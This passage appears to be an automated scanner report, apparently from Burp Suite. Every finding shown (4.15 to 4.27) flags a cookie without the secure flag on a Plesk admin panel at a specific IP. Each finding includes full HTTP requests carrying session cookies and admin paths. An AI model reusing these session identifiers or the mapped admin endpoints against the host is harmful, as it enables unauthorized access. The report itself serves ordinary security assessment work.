Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; sessionID=ouhymmzgtdaqakoglnanbrbl; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; PLESKSESSID=b7d5dd4b3a9bb447376c29193bcc7fd3; psaContext=home

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 06:49:21 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=service-plans; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 06:49:22 GMT
Connection: close
Content-Length: 13739

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.15. https://50.22.21.242:8443/admin/customer/create  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/customer/create

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer/create HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/admin/customer/list?context=customers
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:40:23 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=customers; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:40:22 GMT
Content-Length: 46685

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.16. https://50.22.21.242:8443/admin/customer/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/customer/list

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer/list?context=customers HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/admin/domain/list?context=domains
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=domains

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:40:17 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=customers; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:40:17 GMT
Content-Length: 17148

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.17. https://50.22.21.242:8443/admin/customer/overview/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/customer/overview/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer/overview/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:59:16 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=customers; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:59:15 GMT
Connection: close
Content-Length: 23868

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.18. https://50.22.21.242:8443/admin/customer/overview/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/customer/overview/id/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer/overview/id/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:59:16 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=customers; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:59:17 GMT
Connection: close
Content-Length: 23868

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.19. https://50.22.21.242:8443/admin/customer/overview/id/3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/customer/overview/id/3

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer/overview/id/3 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/admin/customer/list
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:59:15 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=customers; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:59:15 GMT
Content-Length: 23421

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.20. https://50.22.21.242:8443/admin/domain/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/domain/list

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/domain/list?context=domains HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/admin/health/index?context=health
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=health

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:40:06 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:40:07 GMT
Content-Length: 18941

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.21. https://50.22.21.242:8443/admin/health/chart-image/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/health/chart-image/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/health/chart-image/?parameterId=Services-%3ECpuTime-%3EPanel&period=now-1d&7d0259df353c8f299f74f6bbb54453f4 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/admin/health/index?context=health
Cookie: health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=health

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 38170
Content-Type: image/jpg
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:39:56 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=health; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:39:56 GMT

.PNG
.
...IHDR...N...2......Q_....JtEXtSoftware.RRDtool, Tobias Oetiker <tobi@oetiker.ch>, http://tobi.oetiker.ch.k.
.. .IDATx..}..]Ey.._.Z-*..V5.#).T../....VQ.J4......EQ...%Z...^...$....`P.;V.C..4
...[SNIP]...

4.22. https://50.22.21.242:8443/admin/health/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/health/index

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/health/index?context=health HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/left.php3
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:39:42 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=health; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:39:42 GMT
Content-Length: 8063

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.23. https://50.22.21.242:8443/admin/health/parameters  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/health/parameters

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/health/parameters HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=health

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:39:45 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=health; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:39:45 GMT
Connection: close
Content-Length: 59784

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.24. https://50.22.21.242:8443/admin/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/home

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/home HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/admin/
Cookie: PLESKSESSID=39139572be0e1777a54c9a9ae93f2e91; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 20:38:26 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 20:38:27 GMT
Connection: close
Content-Length: 16717

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.25. https://50.22.21.242:8443/admin/home/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/home/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/home/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; psaContext=home

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 13:41:10 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=health; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 13:41:11 GMT
Connection: close
Content-Length: 9720

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.26. https://50.22.21.242:8443/admin/home/admin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/home/admin

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/home/admin HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/admin-panel=home.admin/
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; psaContext=home

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 13:43:34 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=customers; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 13:43:35 GMT
Connection: close
Content-Length: 9770

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.27. https://50.22.21.242:8443/admin/home/click-promo/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/home/click-promo/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/home/click-promo/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; psaContext=tools; sessionID=onthshevccsqtbfldgbmakbv

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 13:44:36 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=customers; path=/
X-Powered-By: ASP.NET
